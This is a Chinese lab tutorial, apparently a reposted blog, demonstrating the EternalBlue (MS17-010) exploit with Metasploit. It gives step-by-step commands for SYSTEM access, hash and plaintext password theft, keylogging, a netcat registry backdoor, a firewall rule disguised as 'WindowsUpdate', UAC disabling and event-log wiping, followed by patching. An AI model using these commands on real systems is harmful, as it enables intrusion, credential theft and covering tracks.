永恒之蓝完全实战:从SMB扫描到SYSTEM权限,注册表后门+键盘记录+清日志一条龙

news2026/5/10 10:43:13
摘要永恒之蓝MS17-010是2017年WannaCry勒索病毒的罪魁祸首利用SMBv1协议漏洞可远程获取Windows系统最高权限。本文将基于Kali Linux 2026.1与Windows Server 2008 R2靶机使用Metasploit完整演示漏洞扫描、永恒之蓝攻击获取Meterpreter Shell、后渗透阶段的hash抓取、Kiwi明文密码提取、进程迁移、键盘记录、关闭UAC、利用注册表植入NC后门实现开机自启持久化控制、防火墙策略调整以及最终通过安装官方补丁彻底免疫。同时深入解析NetcatNC的诞生故事与核心功能。全文旨在帮助读者理解完整攻击链路、持久化技巧与防御要点。一、实验环境说明设备角色操作系统 / 版本IP地址攻击机Kali Linux 2026.1MSFconsole 6.x10.0.0.129/24靶机Windows Server 2008 R264位10.0.0.152/24网络要求攻击机与靶机同一网段能互相ping通靶机445端口可访问。注意靶机必须开启SMBv1协议Windows Server 2008 R2默认开启且未打KB4013389等补丁。二、Netcat简介网络工具中的瑞士军刀Netcat简称nc被誉为“网络工具中的瑞士军刀”由Hobbit于1995年首次发布。它体积小巧几十KB但功能极其强大可以在两台设备之间建立TCP/UDP连接实现数据交互。核心功能侦听模式在一台设备上开启端口监听等待连接。传输模式从一台设备主动连接到另一台设备的监听端口。端口扫描探测目标开放端口。文件传输通过重定向发送/接收文件。后门通道将命令行绑定到某个端口远程执行系统命令。为什么它适合做后门攻击者获得系统权限后可以将nc.exe上传到受害者主机并配置为开机自启。之后任何时刻攻击者只需nc 目标IP 端口就能获得一个远程命令行且不会在目标上留下明显的恶意进程名称。在本次实验中我们将利用nc在Windows靶机上建立一个开机自启的后门实现持久化控制。三、漏洞传奇从NSA武器库到全球勒索风暴漏洞编号MS17-010包含CVE-2017-0143 ~ CVE-2017-0148影响组件Windows SMBv1 协议理论危害等级严重远程代码执行无需认证故事时间线2017年3月黑客组织Shadow Brokers泄露了NSA美国国家安全局的一批黑客工具其中包括“永恒之蓝”EternalBlue。2017年4月微软紧急发布安全更新MS17-010补丁KB4013389等但大量用户未及时安装。2017年5月12日WannaCry勒索病毒爆发利用永恒之蓝漏洞在短短几天内感染全球150多个国家30万台电脑造成数十亿美元损失。2017年5月13日一名安全研究员注册了病毒代码中的kill‑switch域名意外阻止了传播但变种仍层出不穷。漏洞原理简版SMBv1在处理特定类型的数据包时存在多个缓冲区溢出漏洞。攻击者可发送精心构造的SMB消息触发内核态代码执行从而获得SYSTEM权限。影响系统未打补丁Windows Vista / 7 / 8 / 8.1Windows Server 2008 / 2008 R2 / 2012 / 2012 R2Windows 10 早期版本已修复四、攻击阶段从扫描到获得Meterpreter Shell步骤1启动MSF并搜索永恒之蓝模块msfconsole -q msf search ms17-010关键模块auxiliary/scanner/smb/smb_ms17_010—— 扫描检测模块exploit/windows/smb/ms17_010_eternalblue—— 攻击利用模块auxiliary/admin/smb/ms17_010_command—— 命令执行辅助模块步骤2扫描确认漏洞存在msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出应包括[] 10.0.0.152:445 - Host is likely VULNERABLE to MS17-010!步骤3发起攻击获取Meterpretermsf back msf use exploit/windows/smb/ms17_010_eternalblue msf set RHOSTS 10.0.0.152 msf run成功后会进入验证权限meterpreter getuid # 获取用户信息五、后渗透阶段占领军全面控制5.1 基础信息收集meterpreter sysinfo meterpreter ipconfig meterpreter shell C:\Windows\system32chcp 65001 chcp 65001 Active code page: 65001 C:\Windows\system32 whoami nt authority\system C:\Windows\system32 exit5.2 抓取密码哈希hashdumpmeterpreter hashdump得到的NTLM哈希可尝试在线MD5解密网站如cmd5.com破解。尝试通过破解的密码进行远程连接5.3 使用Kiwi模块抓取明文密码Kiwi是Mimikatz的MSF集成版可从内存中提取明文密码。meterpreter load kiwi meterpreter help kiwi meterpreter creds_all如果靶机上有登录过的账户可能直接输出明文密码。5.4 进程迁移提高稳定性默认Meterpreter进程可能不稳定迁移到合法进程如explorer.exemeterpreter ps -S explore # 找到explorer.exe的PID meterpreter migrate 1234 # 替换为目标PID meterpreter getuid5.5 键盘记录meterpreter run post/windows/capture/keylog_recorder然后在Windows靶机上打开记事本随意输入一些文字。另打开一个Kali终端查看记录cat /root/.msf4/loot/20260509205936_default_10.0.0.152_host.windows.key_221376.txt5.6 关闭防火墙或添加后门规则方法一粗暴关闭防火墙meterpreter shell C:\Windows\system32chcp 65001 C:\Windows\system32 netsh advfirewall set allprofiles state on #开启防火墙 C:\Windows\system32 netsh advfirewall set allprofiles state off #关闭防火墙方法二添加隐蔽入站规则推荐C:\Windows\system32 netsh advfirewall firewall add rule nameWindowsUpdate dirin actionallow protocoltcp localport4444然后在Windows靶机上打开“高级安全Windows防火墙”查看入站规则可以看到名为“WindowsUpdate”的规则。5.7 关闭UAC用户账户控制UAC会弹窗提醒权限提升操作关闭后可使后门更隐蔽。查看靶机当前UAC级别默认是关闭的运行输入msconfig先打开操作注册表关闭UACreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5.8 利用注册表添加NC后门持久化控制第一步上传nc.exe到靶机Kali默认自带nc.exe路径为/usr/share/windows-binaries/nc.exe。在Meterpreter中上传meterpreter upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\验证上传成功meterpreter ls C:\\windows\\system32\\nc.exe第二步利用注册表添加开机自启后门设置注册表键值使系统每次启动时自动运行nc.exe监听4444端口并将cmd.exe绑定到该端口。meterpreter reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d C:\\windows\\system32\\nc.exe -Ldp 4444 -e cmd.exe参数解释-L持续监听即使连接断开仍继续等待Windows版特有。-d后台运行不弹出窗口。-p 4444监听端口4444。-e cmd.exe连接后执行cmd.exe给予攻击者Shell。第三步查询注册表键值是否添加成功meterpreter reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run输出中应包含新创建的项nc。查询详细内容meterpreter reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc应显示Key: HKLM\software\microsoft\windows\currentversion\RunName: ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe第四步远程启动后门或等待靶机重启无需重启立即手动启动后门meterpreter shell C:\Windows\system32 nc.exe -Ldp 4444 -e cmd.exe此时nc开始在后台监听4444端口。若靶机防火墙开启需放行4444端口或暂时关闭防火墙可参考5.6第五步攻击机连接后门在Kali新终端中保持MSF会话存在或退出nc 10.0.0.152 4444连接成功后你将获得靶机的cmd命令行至此即使MSF的Meterpreter会话断开只要靶机重启或nc进程存活攻击者仍可通过nc 10.0.0.152 4444随时获得命令行实现持久化后门。5.9 清空事件日志擦除痕迹meterpreter clearev此命令清除应用程序、系统和安全日志。再去靶机的“事件查看器” → “Windows日志” → “安全”中查看会发现日志已被清空。六、防御阶段安装补丁封神补丁信息安全公告MS17-010对应KB编号Windows Server 2008 R2KB4012215下载地址https://catalog.update.microsoft.com/Search.aspx?qKB4012215安装与验证下载补丁并拷贝到靶机运行安装程序完成后重启此补丁需要在安装了SP1补丁的前提下安装可参考上篇文章再次使用MSF扫描模块msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出变为[] Host does NOT appear vulnerable。攻击模块无法再获取Shell。结论安装补丁后永恒之蓝漏洞被彻底封堵。七、总结本文针对MS17-010永恒之蓝SMBv1远程代码执行漏洞在Kali Linux 2026.1攻击机10.0.0.129与未打补丁的Windows Server 2008 R2靶机10.0.0.152环境中完整复现了从漏洞扫描、攻击利用到后渗透控制及持久化后门植入的全过程。实验首先使用Metasploit扫描模块确认目标脆弱随后通过永恒之蓝攻击模块成功获取SYSTEM权限的Meterpreter会话。在后渗透阶段依次执行了哈希抓取、Kiwi模块提取明文密码、进程迁移、键盘记录、关闭UAC等操作并重点演示了利用NetcatNC上传后门程序、通过注册表添加开机自启项、实现持久化远程命令行访问的技术细节最后使用clearev命令清除系统日志以掩盖痕迹。同时本文介绍了Netcat作为“网络瑞士军刀”的诞生背景与核心功能。实验最后通过安装微软官方安全更新KB4013389彻底修复漏洞验证了补丁的有效性。结果表明永恒之蓝漏洞利用方式成熟、危害极大且攻击者可结合注册表持久化技术长期控制目标防御方必须及时安装补丁并定期检查注册表启动项及异常进程。重要声明本教程及文中所有操作仅限于合法授权的安全学习与研究。作者及发布平台不承担因不当使用本教程所引发的任何直接或间接法律责任。请务必遵守中华人民共和国网络安全相关法律法规。如果这篇文章帮你解决了实操上的困惑别忘记点击点赞、分享也可以留言告诉我你遇到的其它问题我会尽快回复。你的关注是我坚持原创和细节共享的力量来源谢谢大家。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2600270.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…